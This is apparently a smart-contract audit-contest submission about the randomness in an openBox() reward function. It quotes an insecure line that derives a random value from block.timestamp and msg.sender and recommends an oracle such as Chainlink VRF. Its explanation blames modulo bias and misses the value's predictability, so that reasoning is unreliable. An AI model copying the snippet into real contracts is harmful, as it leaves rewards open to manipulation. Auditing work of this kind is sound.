Modulo Bias in Random Number Generation in openBox() Function
Summary
The openBox() function generates a random value to determine rewards based on a probability distribution. However, the current implementation could lead to modulo bias in the random number generation, affecting the fairness of reward distribution.
Vulnerability Details
The random value is generated using keccak256(abi.encodePacked(block.timestamp, msg.sender)) % 100. This approach can introduce bias because if the output of keccak256 is not uniformly distributed, the modulo operation will not yield an even distribution of numbers between 0 and 99.
-
Vulnerable Code Snippet
uint256 randomValue = uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100;
Impact
All users interacting with the openBox() function who expect a fair chance of receiving rewards could be impacted by the uneven distribution.
Users may experience an unfair distribution of rewards due to modulo bias, leading to some rewards being less likely to be awarded than others. This could decrease user trust in the reward system and reduce engagement.
Tools Used
manual review
Recommendations
Consider using a more robust method for generating random numbers.
A common approach is to utilize an external oracle service (like Chainlink VRF) for true randomness, which eliminates bias.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.